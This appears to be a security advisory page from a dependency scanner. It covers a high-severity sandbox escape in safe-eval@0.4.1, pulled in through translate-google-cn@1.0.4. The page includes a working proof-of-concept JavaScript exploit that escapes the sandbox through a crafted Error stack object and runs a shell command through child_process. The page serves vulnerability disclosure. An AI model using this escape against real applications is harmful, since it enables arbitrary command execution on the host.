translate-google-cn@1.0.4

Vulnerabilities

1 via 1 paths

Dependencies

41

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

high severity

Sandbox Escape

  • Vulnerable module: safe-eval
  • Introduced through: safe-eval@0.4.1

Detailed paths

  • Introduced through: translate-google-cn@1.0.4 safe-eval@0.4.1

Overview

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine.

POC by Anirudh Anand (for node 12.13.0)

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));

Remediation

There is no fixed version for safe-eval.

References